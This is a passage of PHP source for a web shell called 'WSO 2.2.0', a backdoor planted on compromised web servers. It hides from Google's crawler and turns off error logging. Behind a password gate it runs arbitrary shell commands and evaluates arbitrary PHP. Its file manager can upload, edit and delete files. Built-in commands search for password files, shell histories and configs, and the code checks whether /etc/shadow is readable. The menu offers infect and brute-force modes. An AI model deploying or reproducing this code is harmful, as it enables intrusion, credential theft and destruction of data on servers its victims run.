1
2<?php $auth_pass = "21232f297a57a5a743894a0e4a801fc3";
3 $color = "#fff";
4 $default_action = 'FilesMan';
5 @define('SELF_PATH', __FILE__);
6 if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found');
7 exit;
8 } @session_start();
9 @error_reporting(0);
10 @ini_set('error_log',NULL);
11 @ini_set('log_errors',0);
12 @ini_set('max_execution_time',0);
13 @set_time_limit(0);
14 @set_magic_quotes_runtime(0);
15 @define('VERSION', '2.2.0');
16 if( get_magic_quotes_gpc() ) { function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
17 } $_POST = stripslashes_array($_POST);
18 } function printLogin() {
19?>
20 <center>
21 <form method=post style="font-family:fantasy;
22">
23 Password: <input type=password name=pass style="background-color:whitesmoke;
24border:1px solid #FFF;
25"><input type=submit value='>>' style="border:none;
26background-color:teal;
27color:#fff;
28">
29 </form></center>
30
31<?php exit;
32 } if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) if( empty( $auth_pass ) || ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
33 else printLogin();
34 if( strtolower( substr(PHP_OS,0,3) ) == "win" ) $os = 'win';
35 else $os = 'nix';
36 $safe_mode = @ini_get('safe_mode');
37 $disable_functions = @ini_get('disable_functions');
38 $home_cwd = @getcwd();
39 if( isset( $_POST['c'] ) ) @chdir($_POST['c']);
40 $cwd = @getcwd();
41 if( $os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd);
42 $cwd = str_replace("\\", "/", $cwd);
43 } if( $cwd[strlen($cwd)-1] != '/' ) $cwd .= '/';
44 if($os == 'win') $aliases = array( "List Directory" => "dir", "Find index.php in current dir" => "dir /s /w /b index.php", "Find *config*.php in current dir" => "dir /s /w /b *config*.php", "Show active connections" => "netstat -an", "Show running services" => "net start", "User accounts" => "net user", "Show computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all" );
45 else $aliases = array( "List dir" => "ls -la", "list file attributes on a Linux second extended file system" => "lsattr -va", "show opened ports" => "netstat -an | grep -i listen", "Find" => "", "find all suid files" => "find / -type f -perm -04000 -ls", "find suid files in current dir" => "find . -type f -perm -04000 -ls", "find all sgid files" => "find / -type f -perm -02000 -ls", "find sgid files in current dir" => "find . -type f -perm -02000 -ls", "find config.inc.php files" => "find / -type f -name config.inc.php", "find config* files" => "find / -type f -name \"config*\"", "find config* files in current dir" => "find . -type f -name \"config*\"", "find all writable folders and files" => "find / -perm -2 -ls", "find all writable folders and files in current dir" => "find . -perm -2 -ls", "find all service.pwd files" => "find / -type f -name service.pwd", "find service.pwd files in current dir" => "find . -type f -name service.pwd", "find all .htpasswd files" => "find / -type f -name .htpasswd", "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", "find all .bash_history files" => "find / -type f -name .bash_history", "find .bash_history files in current dir" => "find . -type f -name .bash_history", "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", "find .fetchmailrc files in current dir" => "find . 
-type f -name .fetchmailrc", "Locate" => "", "locate httpd.conf files" => "locate httpd.conf", "locate vhosts.conf files" => "locate vhosts.conf", "locate proftpd.conf files" => "locate proftpd.conf", "locate psybnc.conf files" => "locate psybnc.conf", "locate my.conf files" => "locate my.conf", "locate admin.php files" =>"locate admin.php", "locate cfg.php files" => "locate cfg.php", "locate conf.php files" => "locate conf.php", "locate config.dat files" => "locate config.dat", "locate config.php files" => "locate config.php", "locate config.inc files" => "locate config.inc", "locate config.inc.php" => "locate config.inc.php", "locate config.default.php files" => "locate config.default.php", "locate config* files " => "locate config", "locate .conf files"=>"locate '.conf'", "locate .pwd files" => "locate '.pwd'", "locate .sql files" => "locate '.sql'", "locate .htpasswd files" => "locate '.htpasswd'", "locate .bash_history files" => "locate '.bash_history'", "locate .mysql_history files" => "locate '.mysql_history'", "locate .fetchmailrc files" => "locate '.fetchmailrc'", "locate backup files" => "locate backup", "locate dump files" => "locate dump", "locate priv files" => "locate priv" );
46 function printHeader() { if(empty($_POST['charset'])) $_POST['charset'] = "UTF-8";
47 global $color;
48
49?>
50<html><head><meta http-equiv='Content-Type' content='text/html;
51 charset=
52<?php echo $_POST['charset']
53?>'><title>
54<?php echo $_SERVER['HTTP_HOST']
55?> - WSO
56<?php echo VERSION
57?></title>
58<style>
59 body {background-color:#000;
60color:#e1e1e1;
61}
62 body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;
63margin:0;
64vertical-align:top;
65}
66 table.info {color:#C3C3C3;
67background-color:#000;
68}
69 span,h1,a {color:
70<?php echo $color
71?> !important;
72}
73 span {font-weight:bolder;
74}
75 h1 {border-left:5px solid teal;
76padding:2px 5px;
77font:14pt Verdana;
78background-color:#222;
79margin:0px;
80}
81 div.content {padding:5px;
82margin-left:5px;
83background-color:#000;
84}
85 a {text-decoration:none;
86}
87 a:hover {text-decoration:underline;
88}
89 .ml1 {border:1px solid #444;
90padding:5px;
91margin:0;
92overflow:auto;
93}
94 .bigarea {width:100%;
95height:250px;
96 }
97 input, textarea, select {margin:0;
98color:#fff;
99background-color:#444;
100border:1px solid #000;
101 font:9pt Courier New;
102}
103 form {margin:0px;
104}
105 #toolsTbl {text-align:center;
106}
107 .toolsInp {width:300px}
108 .main th {text-align:left;
109background-color:#000;
110}
111 .main tr:hover{background-color:#5e5e5e}
112 .main td, th{vertical-align:middle}
113 .l1 {background-color:#444}
114 pre {font:9pt Courier New;
115}
116</style>
117<script>
118 function set(a,c,p1,p2,p3,charset) {
119 if(a != null)document.mf.a.value=a;
120 if(c != null)document.mf.c.value=c;
121 if(p1 != null)document.mf.p1.value=p1;
122 if(p2 != null)document.mf.p2.value=p2;
123 if(p3 != null)document.mf.p3.value=p3;
124 if(charset != null)document.mf.charset.value=charset;
125 }
126 function g(a,c,p1,p2,p3,charset) {
127 set(a,c,p1,p2,p3,charset);
128 document.mf.submit();
129 }
130 function a(a,c,p1,p2,p3,charset) {
131 set(a,c,p1,p2,p3,charset);
132 var params = "ajax=true";
133 for(i=0;
134i<document.mf.elements.length;
135i++)
136 params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
137 sr('
138<?php echo $_SERVER['REQUEST_URI'];
139
140?>', params);
141 }
142 function sr(url, params) {
143 if (window.XMLHttpRequest) {
144 req = new XMLHttpRequest();
145 req.onreadystatechange = processReqChange;
146 req.open("POST", url, true);
147 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
148 req.send(params);
149 }
150 else if (window.ActiveXObject) {
151 req = new ActiveXObject("Microsoft.XMLHTTP");
152 if (req) {
153 req.onreadystatechange = processReqChange;
154 req.open("POST", url, true);
155 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
156 req.send(params);
157 }
158 }
159 }
160 function processReqChange() {
161 if( (req.readyState == 4) )
162 if(req.status == 200) {
163 //alert(req.responseText);
164 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
165 var arr=reg.exec(req.responseText);
166 eval(arr[2].substr(0, arr[1]));
167 }
168 else alert("Request error!");
169 }
170</script>
171<head><body><div style="position:absolute;
172width:100%;
173background-color:#444;
174top:0;
175left:0;
176">
177<form method=post name=mf style='display:none;
178'>
179<input type=hidden name=a value='
180<?php echo isset($_POST['a'])?$_POST['a']:''
181?>'>
182<input type=hidden name=c value='
183<?php echo htmlspecialchars($GLOBALS['cwd'])
184?>'>
185<input type=hidden name=p1 value='
186<?php echo isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''
187?>'>
188<input type=hidden name=p2 value='
189<?php echo isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''
190?>'>
191<input type=hidden name=p3 value='
192<?php echo isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''
193?>'>
194<input type=hidden name=charset value='
195<?php echo isset($_POST['charset'])?$_POST['charset']:''
196?>'>
197</form>
198
199<?php $freeSpace = @diskfreespace($GLOBALS['cwd']);
200 $totalSpace = @disk_total_space($GLOBALS['cwd']);
201 $totalSpace = $totalSpace?$totalSpace:1;
202 $release = @php_uname('r');
203 $kernel = @php_uname('s');
204 $millink='https://github.com/HARDLINUX/webshell/search?utf8=✓&q=';
205 if( strpos('Linux', $kernel) !== false ) $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) );
206 else $millink .= urlencode( $kernel . ' ' . substr($release,0,3) );
207 if(!function_exists('posix_getegid')) { $user = @get_current_user();
208 $uid = @getmyuid();
209 $gid = @getmygid();
210 $group = "?";
211 } else { $uid = @posix_getpwuid(@posix_geteuid());
212 $gid = @posix_getgrgid(@posix_getegid());
213 $user = $uid['name'];
214 $uid = $uid['uid'];
215 $group = $gid['name'];
216 $gid = $gid['gid'];
217 } $cwd_links = '';
218 $path = explode("/", $GLOBALS['cwd']);
219 $n=count($path);
220 for($i=0;
221$i<$n-1;
222$i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
223 for($j=0;
224$j<=$i;
225$j++) $cwd_links .= $path[$j].'/';
226 $cwd_links .= "\")'>".$path[$i]."/</a>";
227 } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
228 $opt_charsets = '';
229 foreach($charsets as $item) $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
230 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network','Domains'=>'Domains');
231 if(!empty($GLOBALS['auth_pass'])) $m['Logout'] = 'Logout';
232 $m['Self remove'] = 'SelfRemove';
233 $menu = '';
234 foreach($m as $k => $v) $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
235 $drives = "";
236 if ($GLOBALS['os'] == 'win') { foreach( range('a','z') as $drive ) if (is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
237 } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:'.($GLOBALS['os'] == 'win'?'<br>Drives:':'').'</span></td>'. '<td><nobr>'.substr(@php_uname(), 0, 120).' <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[Exploit-Git]</a></nobr><br>'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00A8A8><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>'.$drives.'</td>'. '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'. '<table cellpadding=3 cellspacing=0 width=100% style="background-color:teal;
238"><tr>'.$menu.'</tr></table><div>';
239 } function printFooter() { $is_writable = is_writable($GLOBALS['cwd'])?"<font color=teal>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>";
240
241?>
242</div>
243<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%">
244 <tr>
245 <td><form onsubmit="g(null,this.c.value);
246return false;
247"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="
248<?php echo htmlspecialchars($GLOBALS['cwd']);
249
250?>"><input type=submit value=">>"></form></td>
251 <td><form onsubmit="g('FilesTools',null,this.f.value);
252return false;
253"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
254 </tr>
255 <tr>
256 <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);
257return false;
258"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>
259<?php echo $is_writable
260?></td>
261 <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');
262return false;
263"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>
264<?php echo $is_writable
265?></td>
266 </tr>
267 <tr>
268 <td><form onsubmit="g('Console',null,this.c.value);
269return false;
270"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
271 <td><form method='post' ENCTYPE='multipart/form-data'>
272 <input type=hidden name=a value='FilesMAn'>
273 <input type=hidden name=c value='
274<?php echo htmlspecialchars($GLOBALS['cwd'])
275?>'>
276 <input type=hidden name=p1 value='uploadFile'>
277 <input type=hidden name=charset value='
278<?php echo isset($_POST['charset'])?$_POST['charset']:''
279?>'>
280 <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>
281<?php echo $is_writable
282?></td>
283 </tr>
284</table>
285</div>
286</body></html>
287
288<?php } if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false;
289 } } if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false;
290 } } function ex($in) { $out = '';
291 if(function_exists('exec')) { @exec($in,$out);
292 $out = @join("\n",$out);
293 }elseif(function_exists('passthru')) { ob_start();
294 @passthru($in);
295 $out = ob_get_clean();
296 }elseif(function_exists('system')) { ob_start();
297 @system($in);
298 $out = ob_get_clean();
299 }elseif(function_exists('shell_exec')) { $out = shell_exec($in);
300 }elseif(is_resource($f = @popen($in,"r"))) { $out = "";
301 while(!@feof($f)) $out .= fread($f,1024);
302 pclose($f);
303 } return $out;
304 } function viewSize($s) { if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB';
305 elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB';
306 elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB';
307 else return $s . ' B';
308 } function perms($p) { if (($p & 0xC000) == 0xC000)$i = 's';
309 elseif (($p & 0xA000) == 0xA000)$i = 'l';
310 elseif (($p & 0x8000) == 0x8000)$i = '-';
311 elseif (($p & 0x6000) == 0x6000)$i = 'b';
312 elseif (($p & 0x4000) == 0x4000)$i = 'd';
313 elseif (($p & 0x2000) == 0x2000)$i = 'c';
314 elseif (($p & 0x1000) == 0x1000)$i = 'p';
315 else $i = 'u';
316 $i .= (($p & 0x0100) ? 'r' : '-');
317 $i .= (($p & 0x0080) ? 'w' : '-');
318 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
319 $i .= (($p & 0x0020) ? 'r' : '-');
320 $i .= (($p & 0x0010) ? 'w' : '-');
321 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
322 $i .= (($p & 0x0004) ? 'r' : '-');
323 $i .= (($p & 0x0002) ? 'w' : '-');
324 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
325 return $i;
326 } function viewPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
327 elseif (!@is_writable($f)) return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
328 else return '<font color=#00A8A8><b>'.perms(@fileperms($f)).'</b></font>';
329 } if(!function_exists("scandir")) { function scandir($dir) { $dh = opendir($dir);
330 while (false !== ($filename = readdir($dh))) { $files[] = $filename;
331 } return $files;
332 } } function which($p) { $path = ex('which '.$p);
333 if(!empty($path)) return $path;
334 return false;
335 } function actionSecInfo() { printHeader();
336 echo '<h1>Server security information</h1><div class=content>';
337 function showSecParam($n, $v) { $v = trim($v);
338 if($v) { echo '<span>'.$n.': </span>';
339 if(strpos($v, "\n") === false) echo $v.'<br>';
340 else echo '<pre class=ml1>'.$v.'</pre>';
341 } } showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
342 showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
343 showSecParam('Open base dir', @ini_get('open_basedir'));
344 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
345 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
346 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
347 $temp=array();
348 if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")";
349 if(function_exists('mssql_connect')) $temp[] = "MSSQL";
350 if(function_exists('pg_connect')) $temp[] = "PostgreSQL";
351 if(function_exists('oci_connect')) $temp[] = "Oracle";
352 showSecParam('Supported databases', implode(', ', $temp));
353 echo '<br>';
354 if( $GLOBALS['os'] == 'nix' ) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
355 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
356 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
357 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
358 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
359 showSecParam('OS version', @file_get_contents('/proc/version'));
360 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
361 if(!$GLOBALS['safe_mode']) { echo '<br>';
362 $temp=array();
363 foreach ($userful as $item) if(which($item)){$temp[]=$item;
364} showSecParam('Userful', implode(', ',$temp));
365 $temp=array();
366 foreach ($danger as $item) if(which($item)){$temp[]=$item;
367} showSecParam('Danger', implode(', ',$temp));
368 $temp=array();
369 foreach ($downloaders as $item) if(which($item)){$temp[]=$item;
370} showSecParam('Downloaders', implode(', ',$temp));
371 echo '<br/>';
372 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
373 showSecParam('HDD space', ex('df -h'));
374 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
375 } } else { showSecParam('OS Version',ex('ver'));
376 showSecParam('Account Settings',ex('net accounts'));
377 showSecParam('User Accounts',ex('net user'));
378 } echo '</div>';
379 printFooter();
380 } function actionPhp() { if( isset($_POST['ajax']) ) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
381 ob_start();
382 eval($_POST['p1']);
383 $temp = "document.getElementById('PhpOutput').style.display='';
384document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';
385\n";
386 echo strlen($temp), "\n", $temp;
387 exit;
388 } printHeader();
389 if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { echo '<h1>PHP info</h1><div class=content>';
390 ob_start();
391 phpinfo();
392 $tmp = ob_get_clean();
393 $tmp = preg_replace('!body {.*}!msiU','',$tmp);
394 $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
395 $tmp = preg_replace('!h1!msiU','h2',$tmp);
396 $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
397 $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
398 echo $tmp;
399 echo '</div><br>';
400 } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
401 echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);
402}else{g(null,null,this.code.value,\'\');
403}return false;
404"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
405 echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;
406':'').'margin-top:5px;
407" class=ml1>';
408 if(!empty($_POST['p1'])) { ob_start();
409 eval($_POST['p1']);
410 echo htmlspecialchars(ob_get_clean());
411 } echo '</pre></div>';
412 printFooter();
413 } function actionFilesMan() { printHeader();
414 echo '<h1>File manager</h1><div class=content>';
415 if(isset($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!";
416 break;
417 break;
418 case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir";
419 break;
420 case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/';
421 $dh = opendir($path);
422 while ( ($item = readdir($dh) ) !== false) { $item = $path.$item;
423 if ( (basename($item) == "..") || (basename($item) == ".") ) continue;
424 $type = filetype($item);
425 if ($type == "dir") deleteDir($item);
426 else @unlink($item);
427 } closedir($dh);
428 rmdir($path);
429 } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { $f = urldecode($f);
430 if(is_dir($f)) deleteDir($f);
431 else @unlink($f);
432 } break;
433 case 'paste': if($_SESSION['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);
434 $h = opendir($c.$s);
435 while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.'/',$f, $d.$s.'/');
436 } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);
437 } } foreach($_SESSION['f'] as $f) copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
438 } elseif($_SESSION['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s);
439 $h = opendir($c.$s);
440 while (($f = readdir($h)) !== false) if (($f != ".") and ($f != "..")) { copy_paste($c.$s.'/',$f, $d.$s.'/');
441 } } elseif(is_file($c.$s)) { @copy($c.$s, $d.$s);
442 } } foreach($_SESSION['f'] as $f) @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
443 } unset($_SESSION['f']);
444 break;
445 default: if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { $_SESSION['act'] = @$_POST['p1'];
446 $_SESSION['f'] = @$_POST['f'];
447 foreach($_SESSION['f'] as $k => $f) $_SESSION['f'][$k] = urldecode($f);
448 $_SESSION['cwd'] = @$_POST['c'];
449 } break;
450 } echo '<script>document.mf.p1.value="";
451document.mf.p2.value="";
452</script>';
453 } $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
454 if($dirContent === false) { echo 'Can\'t open this folder!';
455 return;
456 } global $sort;
457 $sort = array('name', 1);
458 if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]);
459 }
460?>
461<script>
462 function sa() {
463 for(i=0;
464i<document.files.elements.length;
465i++)
466 if(document.files.elements[i].type == 'checkbox')
467 document.files.elements[i].checked = document.files.elements[0].checked;
468 }
469</script>
470<table width='100%' class='main' cellspacing='0' cellpadding='2'>
471<form name=files method=post>
472
473<?php echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
474 $dirs = $files = $links = array();
475 $n = count($dirContent);
476 for($i=0;
477$i<$n;
478$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
479 $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
480 $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) );
481 if(@is_file($GLOBALS['cwd'].$dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file'));
482 elseif(@is_link($GLOBALS['cwd'].$dirContent[$i])) $links[] = array_merge($tmp, array('type' => 'link'));
483 elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != ".")) $dirs[] = array_merge($tmp, array('type' => 'dir'));
484 } $GLOBALS['sort'] = $sort;
485 function cmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
486 else return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
487 } usort($files, "cmp");
488 usort($dirs, "cmp");
489 usort($links, "cmp");
490 $files = array_merge($dirs, $links, $files);
491 $l = 0;
492 foreach($files as $f) { echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');
493"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms'] .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
494 $l = $l?0:1;
495 }
496?>
497 <tr><td colspan=7>
498 <input type=hidden name=a value='FilesMan'>
499 <input type=hidden name=c value='
500<?php echo htmlspecialchars($GLOBALS['cwd'])
501?>'>
502 <input type=hidden name=charset value='
503<?php echo isset($_POST['charset'])?$_POST['charset']:''
504?>'>
505 <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>
506<?php if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){
507?><option value='paste'>Paste</option>
508<?php }
509?></select>
510<input type="submit" value=">>"></td></tr>
511 </form></table></div>
512
513<?php printFooter();
514 } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));
515}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';
516for($i=0;
517$i<strLen($p);
518$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));
519}return $r;
520}} if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';
521for($i=0;
522$i<strlen($p);
523++$i)$r.= dechex(ord($p[$i]));
524return strtoupper($r);
525}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';
526for($i=0;
527$i<strlen($p);
528++$i)$r.= '%'.dechex(ord($p[$i]));
529return strtoupper($r);
530}} if(isset($_POST['ajax'])) { $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
531 ob_start();
532 if(function_exists($_POST['p1'])) echo $_POST['p1']($_POST['p2']);
533 $temp = "document.getElementById('strOutput').style.display='';
534document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';
535\n";
536 echo strlen($temp), "\n", $temp;
537 exit;
538 } printHeader();
539 echo '<h1>String conversions</h1><div class=content>';
